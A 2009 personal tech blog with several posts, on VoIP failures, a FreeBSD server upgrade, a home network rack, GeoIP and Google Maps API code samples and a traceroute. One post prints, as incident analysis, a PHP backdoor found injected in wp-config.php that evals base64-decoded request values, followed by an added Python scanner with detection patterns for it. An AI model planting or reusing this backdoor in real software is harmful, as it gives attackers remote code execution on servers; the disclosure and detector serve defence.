New-fangled Phone-things

September 18th, 2009

I’ve been failed pretty badly by my rather new-age phone setup over the last few days. I’ve missed important calls by an abject failure of my carriers to deliver them to my handsets.

For instance, early this week, Google Voice (or QuantumVoice, my VoIP provider) was failing to deliver calls to my ATA. Calls to my “home” number went to voicemail, which is a message that says “call my Google Voice number.”

And tonight, I discovered that my iPhone has been reporting solid 3G for 2 days straight but has been lying to me. I rebooted it this evening at a restaurant to discover I had 3 voicemails and 1 text message from YESTERDAY.

Some days, I long for old world landlines. I might just get one; Qwest is building out an ADSL2 cabinet outside my subdivision and have told me it should be online by October 7th. It might be time to migrate from cable to ADSL and pick up a landline in the process. At least then I’ll have faith that my incoming calls will complete.

Cranky grumbling complete.

I suck at remembering what I fixed, so I rely on svn

September 13th, 2009

A user came into #help on EsperNet today and asked about an issue with ChanServ’s KEEPTOPIC feature.

I remembered this being a bug, but I totally forgot that I fixed it.

So, I asked Subversion:

------------------------------------------------------------------------
r196 | srees | 2009-04-25 11:16:22 -0600 (Sat, 25 Apr 2009) | 2 lines

* "Fix" TBURST to send 0 as the channel TS to force esphyb servers to accept the topic
 bursts at any time (not just at channel creation)

Now, the only problem is that I wasn’t sure whether or not I deployed this fix. Oh well, one problem at a time.

I love commit logs.

Well, an update worth its salt

September 2nd, 2009

(turns out I have something technical to blog about, after all.)

Well, I haven’t played with WordPress for a while and it turns out I was a few point-releases back. But, I digress.

When I was writing the last post, I noticed that there was some funny syntax at the end of the Permalink. Actually, it said something like base64_encode and $_SERVER["HTTP_EXECCODE"]. For some reason, I saw these and ignored them (in fact, I mentally chalked them up to a weirdness in Safari on Snow Leopard).

I had a bit of dinner, then my brain turned on. I was looking at PHP that got included inline into markup; this was not a browser bug.

After some investigation, I found a spurious new function added to my wp-config.php (below). This, combined with the update to my Permalink format, suggested server (or application) compromise. The offending code (pretty-printed for readability):

function gpc_4663($l4665) {
  if (is_array($l4665)) {
    foreach($l4665 as $l4663 => $l4664)
      $l4665[$l4663] = gpc_4663($l4664);
   } else if (is_string($l4665) && substr($l4665,0,4)=="____") {
     eval(base64_decode(substr($l4665,4)));
     $l4665=null;
   }

   return $l4665;
}

if(empty($_SERVER))
  $_SERVER = $HTTP_SERVER_VARS;

array_map("gpc_4663",$_SERVER);

Arbitrary code injection — through query parameter, no less. Someone could simply go to any page including this file (which is any database-accessing page) and add a Base64-encoded string with code for the PHP interpreter to execute. Great.

I think the worst thing about this compromise is that I have no idea how the attacker did it.

As I said before, I was a few point releases behind on my WordPress installation. Unfortunately, if this was a known attack, I have no way of knowing it. The folks over at WordPress are seemingly tight-lipped as to the nature of their security updates, so if you’ve been compromised along a vector they’ve since fixed, you’re in the dark. Now I’m just wondering if I still have a big open hole in my WordPress installation.

As for the loss of data, my post-incident analysis reveals that the compromiser got nothing. Whew.

Oh well. If you run WordPress, check your installs.
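
Added example (not part of the original post, and not WordPress code): a small Python scanner for the three indicators visible in the snippet above, namely `eval` of decoded data, a callback mapped over a request superglobal, and a function defined inside `wp-config.php`. The rule names, the `scan_php_source` and `scan_tree` helpers and the sample strings are constructed for illustration; the rule that a stock `wp-config.php` defines no functions is a heuristic assumption.

```python
import re
from pathlib import Path

# Heuristic rules for this example; the last assumes a stock wp-config.php defines no functions.
RULES = {
    "eval-of-decoded-data": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "callback-over-superglobal": re.compile(
        r"\barray_(?:map|walk)\s*\(.*\$_(?:SERVER|GET|POST|COOKIE|REQUEST)\b", re.I),
    "function-defined-in-config": re.compile(r"^\s*function\s+\w+\s*\(", re.I),
}
CONFIG_ONLY = {"function-defined-in-config"}

def scan_php_source(text, filename="wp-config.php"):
    """Return (line_number, rule_name) hits, in line order, for one PHP file."""
    is_config = Path(filename).name == "wp-config.php"
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if name in CONFIG_ONLY and not is_config:
                continue
            if pattern.search(line):
                hits.append((lineno, name))
    return hits

def scan_tree(root):
    """Scan every *.php file under root; return {path: hits} for flagged files."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"), path.name)
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: INFECTED abridges the function shown in the post.
INFECTED = '''<?php
define('DB_NAME', 'wordpress');
function gpc_4663($l4665) {
  if (is_string($l4665) && substr($l4665,0,4)=="____") {
    eval(base64_decode(substr($l4665,4)));
  }
}
array_map("gpc_4663",$_SERVER);
'''
CLEAN = "<?php\ndefine('DB_NAME', 'wordpress');\n"

if __name__ == "__main__":
    for lineno, rule in scan_php_source(INFECTED):
        print(f"wp-config.php:{lineno}: {rule}")
```

Hits are leads for manual review rather than verdicts: legitimate plugins sometimes use `base64_decode`, and an obfuscated variant can avoid these exact patterns, so comparing files against a clean copy of the same WordPress release remains the stronger check.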

Monthly Post

September 2nd, 2009

Point Reyes National Seashore

I promised myself I would blog more often and on technical subjects. Lately, I’ve been hacking on some cool networking stuff at work and hacking on my house in my spare time (finally finalizing my basement!) and traveling. So, I haven’t done anything super-exciting tech-wise that I feel comfortable blogging about, so I’ll post with a lovely picture of my trip to California.

This is a photo from a hike my brother and I did out at Point Reyes National Seashore last month. Great fun, but I think I wore out my feet on that hike.

That’s it for now. Hopefully something more substantial in the near future.

Socializing Medicine by Taxing the Rich

August 1st, 2009

So, I had this thought just a minute ago (literally as I was closing my eyes to go to sleep). This thought is half-baked at best. (disclaimer over)

For some reason, I remembered that during President George W Bush’s administration, one of his economic principles was the “trickle-down” methodology. To me, this meant approximately this:

  1. Lower taxes on higher income brackets.
  2. The high-earners now have more money to spend.
  3. The high-earners spend money and that stimulates the economy.

So, by using that logic, it seems that if we were to socialize medicine (disclaimer #2: I have no particular feelings on healthcare reform other than I think something should be done and that I’m not smart enough nor informed enough to know precisely what we should do) by taxing the rich, we would in essence be re-capturing a pre-existing expense (that is: health insurance for employees) as a “tax.” I think it might even be net-zero.

Let’s see:

  1. We “socialize” medicine by taking the cost of health insurance out of the regular economy and assigning it to the government; this removes a huge cost burden on American companies (may help them stay competitive with international firms, too)
  2. Big-time investors in these companies realize higher dividends due to higher profits driven by lowered costs.
  3. Raise taxes on the very wealthy to pay for this healthcare, some (most?) of whom may be the very same big-time investors (in the aggregate of their investments).

In essence, because the government (“the people”) assumed the cost of healthcare in this scenario (which some have called a “crushing cost”), private investors would see higher dividends on their investments. We would then (indirectly) tax those gains away to pay for it. It’s possible the effect would be net-zero (or even net-positive if costs are actually lowered) in the long term. So, in the end, we improved the efficiency of the private sector and converted pre-existing costs into approximately equivalent (maybe even lower) taxes.

(Note #1: This idea conveniently ignores tax-sheltered investments and small-time investors; it also presumes that lower costs will not translate to lower consumer pricing. Also, this idea is lacking in specific numbers; this is further evidence of my overall lack of economic sophistication.)

(Note #2: The thought that “socializing” medicine may lower costs is on the basis that Medicare has very low overhead (I’ve heard 2-5%) versus private insurers (I’ve heard 25-35%). Also, I imagine if there was a single-payer, that the medical billing costs in doctors’ offices would lessen.)

(Note #3: This also assumes the size of the problem stays the same. This is probably not true as the goal of healthcare reform is to cover more people/everyone. See note #2 though.)

See what I mean about half-baked? Now time for bed.

episkey Upgrade

July 26th, 2009

So, it’s been over a year since I racked my server (episkey) at its data center. I’ve done such an enormously successful job of remote management that I haven’t had a need to make a visit until today.

So, with Myles’ help, we headed out to the data center out in the middle-of-nowhere (really, it’s pretty out there) with a new (bigger! better!) hard drive in tow and a software upgrade staged.

My overwhelming skills at FreeBSD management paid off once again. I had the upgrade in its final state (“install and reboot!”) and the data backed up. In the end, episkey ended up running FreeBSD 7.2-STABLE (from 7.0-STABLE) and a 1TB drive for user data (up from 80GB). The whole process took about 45 minutes and included unracking and reracking the box for the disk install. This was the very definition of smooth.

The sad statistic: 45 minutes of actual work and 3 hours of driving. Like I said, the data center is pretty far out of the way. It even has a cattle gate.

Really.

In other news, I’ve been working with Rory on a web front-end to ircservices. My part has been to refactor the ircservices httpd module to export XML (parseable) as opposed to hackneyed HTML. Rory’s been working on a PHP front-end. So far so good; I hope we can prove out some useful functionality for our users.

Showing Off my Rack

July 18th, 2009

The home network rack in the basement.

I’ve always wanted to have a rack of equipment in my house. I don’t know why, but I’ve always had a fairly strong IT-oriented bent to my geekery (networks, servers, and things) and having my own rack just seemed like a natural thing.

So, when I finished my basement, I made a special point to finally achieve my rackish goal.

And here it is!

I have 15 ports of Cat5e running through to the various rooms in my town house all terminated into a patch panel and then into the ProCurve 1800 at the top. I also broke out and terminated my phone lines onto that patch panel; so now I have 4 and 4 (incoming lines from Qwest, outgoing lines to my wall jacks) that can be patched together however I want. I did the same thing to the 12 runs of coax I had; they all terminate into a coax patch panel (inputs from Comcast, Dish Network, and DTV Antenna — outputs to all the jacks around the house).

All the media center equipment and servers are also in this room (out of picture, except avifors – the Dell at the bottom right).

All in all, I’m pretty happy with this setup and pretty eager to show it off. So, here it is :)

(also in picture: Cisco 2950 and 2600 for testing/learning purposes, APC by Schneider Electric[1] UPS, and shelf with the cable modem, VoIP adapter, and WAP).

[1] – I just couldn’t help myself.

Geeking with GeoIP

July 11th, 2009

In the continuing theme of geography, I started playing around with MaxMind’s libGeoIP C API for integration into the Blitzed Open-Proxy Monitor (BOPM) for EsperNet (for more information on this, contact me directly).

This, like the Google Maps API, is a remarkably easy API to use. For EsperNet’s purposes, we only want to discover the country code of each user connecting to the network. It’s pretty much as simple as saying “Hey libGeoIP, what country is 1.2.3.4 from?”

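#include <stdio.h>
#include <GeoIP.h>

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <ipv4-address>\n", argv[0]);
        return 1;
    }
    char *addr = argv[1];

    // get geoip.dat from http://www.maxmind.com/app/geolitecountry
    GeoIP *gi = GeoIP_open("geoip.dat", GEOIP_MEMORY_CACHE | GEOIP_CHECK_CACHE);
    if (gi == NULL) {
        fprintf(stderr, "could not open geoip.dat\n");
        return 1;
    }

    // both lookups return NULL when the address is not in the database
    const char *name = GeoIP_country_name_by_addr(gi, addr);
    const char *code = GeoIP_country_code_by_addr(gi, addr);

    printf("%s is from %s (%s)\n", addr,
        name ? name : "unknown", code ? code : "??");

    GeoIP_close(gi);
    return 0;
}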

I’m wondering what else I can integrate this into… maybe ircservices for statistics purposes.

A trace from the past

July 4th, 2009

I found this little gem in my old bucket.

The two endpoints are in Colorado (from my house to the server you’re reading this on). Usually the routing is a little more… direct:

traceroute to episkey.dreamfire.net (208.72.157.61), 64 hops max, 40 byte packets
1  * * *
2  ge-3-1-ur01.fortcollins.co.denver.comcast.net (68.85.220.105)  8.680 ms  11.842 ms  8.921 ms
3  te-9-3-ur02.longmont.co.denver.comcast.net (68.86.103.157)  10.205 ms  11.055 ms  8.932 ms
4  te-9-1-ur01.longmont.co.denver.comcast.net (68.86.103.161)  10.228 ms  9.643 ms  9.276 ms
5  te-3-1-ar01.denver.co.denver.comcast.net (68.86.103.154)  11.923 ms  9.321 ms  13.237 ms
6  68.86.128.249 (68.86.128.249)  11.055 ms  10.652 ms  11.312 ms
7  68.86.91.17 (68.86.91.17)  19.896 ms  11.706 ms  9.283 ms
8  pos-0-10-0-0-cr01.denver.co.ibone.comcast.net (68.86.86.22)  14.862 ms  11.630 ms  14.365 ms
9  pos-0-8-0-0-cr01.chicago.il.ibone.comcast.net (68.86.85.113)  37.695 ms  37.270 ms  37.667 ms
10  po-0-1-0-0-pe01.350ecermak.il.ibone.comcast.net (68.86.86.38)  36.850 ms  38.605 ms  36.660 ms
11  208.173.180.41 (208.173.180.41)  36.016 ms  36.893 ms  36.004 ms
12  bpr1-ge-7-0-0.chicagoequinix.savvis.net (204.70.194.249)  35.500 ms  36.743 ms  35.415 ms
13  208.174.226.26 (208.174.226.26)  37.763 ms  38.972 ms
    0.so-0-0-2.BR6.CHI2.ALTER.NET (208.174.226.2)  37.689 ms
14  po4-0.core01.ord03.atlas.cogentco.com (154.54.13.109)  36.536 ms  37.211 ms  49.305 ms
15  te3-1.mpd01.ord03.atlas.cogentco.com (154.54.3.234)  37.265 ms  36.783 ms  38.449 ms
16  xo.ord03.atlas.cogentco.com (154.54.12.230)  38.080 ms  39.006 ms  40.243 ms
17  te-3-2-0.rar3.chicago-il.us.xo.net (207.88.12.13)  36.732 ms  44.135 ms  38.561 ms
18  207.88.12.149.ptr.us.xo.net (207.88.12.149)  78.573 ms  70.847 ms
    bpr1-ge-7-0-0.chicagoequinix.savvis.net (204.70.194.249)  38.535 ms
19  204.70.1.6 (204.70.1.6)  74.638 ms  108.290 ms  65.531 ms
20  cr1-pos-0-8-2-3.NewYork.savvis.net (204.70.1.5)  68.222 ms  74.689 ms  64.239 ms
21  204.70.1.6 (204.70.1.6)  86.968 ms  82.962 ms  86.217 ms
22  cr1-pos-0-8-2-3.NewYork.savvis.net (204.70.1.5)  66.318 ms
    208.175.175.89 (208.175.175.89)  89.899 ms  89.622 ms
23  dpr1-ge-2-0-0.dallasequinix.savvis.net (204.70.204.146)  89.152 ms  84.768 ms  87.890 ms
24  0.so-0-2-0.BR1.DFW9.ALTER.NET (204.255.169.101)  66.370 ms
    208.173.178.170 (208.173.178.170)  67.619 ms
    0.so-0-2-0.BR1.DFW9.ALTER.NET (204.255.169.101)  63.557 ms
25  0.so-5-0-0.XT4.DFW9.ALTER.NET (152.63.96.78)  64.431 ms  71.442 ms  62.534 ms
26  0.so-7-1-1.XL4.DFW7.ALTER.NET (152.63.103.41)  63.858 ms  67.172 ms  64.701 ms
27  * * *
28  episkey (208.72.157.61)  46.105 ms  44.135 ms  43.661 ms

This trace came around when my data center was switching to and from its primary links (Internap and Cogent); this trace comes amid route convergence along the rest of the internet. Fun, anyway, though :)

Playing with Google Maps API

July 2nd, 2009

Google-enabled Esper Servers Page

I had the chance a few days ago to play with the Google Maps API to rework EsperNet’s Servers Page. It turns out that very much like Google’s applications, its APIs are also ludicrously easy to use.

I only spent a few hours putting together a real server map (as opposed to a static table of names, locations, etc) that actually looks nice!

To be honest, I spent most of the time putting together the little fly out window. It required new CSS classes and a lot of construction and insertion of elements into the DOM. Getting it looking just right (doesn’t quite look right in IE 7 — the staff table doesn’t show up) was by far the most time consuming activity.

To get started with something like this, get yourself a Google Map API key and code up a little something like this:

<!-- style for height and width -->
<div id="map"></div>
<script type="text/javascript">
  // initialize the map
  function initialize_map() {
    if (GBrowserIsCompatible()) {
      var map = new GMap2(document.getElementById("map"));

      map.setCenter(new GLatLng(50,-50), 2);

      map.setUIToDefault();
    }
  }

  // add events to run on load for IE (top block) and everything else (bottom)
  if (window.attachEvent) {
    window.attachEvent("onload", initialize_map);
    window.attachEvent("onunload", GUnload);
  } else {
    window.addEventListener("load", initialize_map, false);
    window.addEventListener("unload", GUnload, false);
  }
</script>

You can then add new points very easily:

// `map` is the GMap2 instance created in initialize_map()
var point = new GLatLng(50, 50); // latitude, longitude (numbers, not strings)
var marker = new GMarker(point, { title:"Cool Title" });

GEvent.addListener(marker, "click", function() {
  marker.openInfoWindow(document.createTextNode("info"));
});

map.addOverlay(marker);

You can call openInfoWindow with any DOM element. For the servers page, I built up a DIV filled with some text and a table. Or you can just add text.

For latitude and longitude, I used Google Maps and put in a city name (e.g., Morrison, CO). I’m not sure if there’s an easy way to do this through the API. It would make life simpler!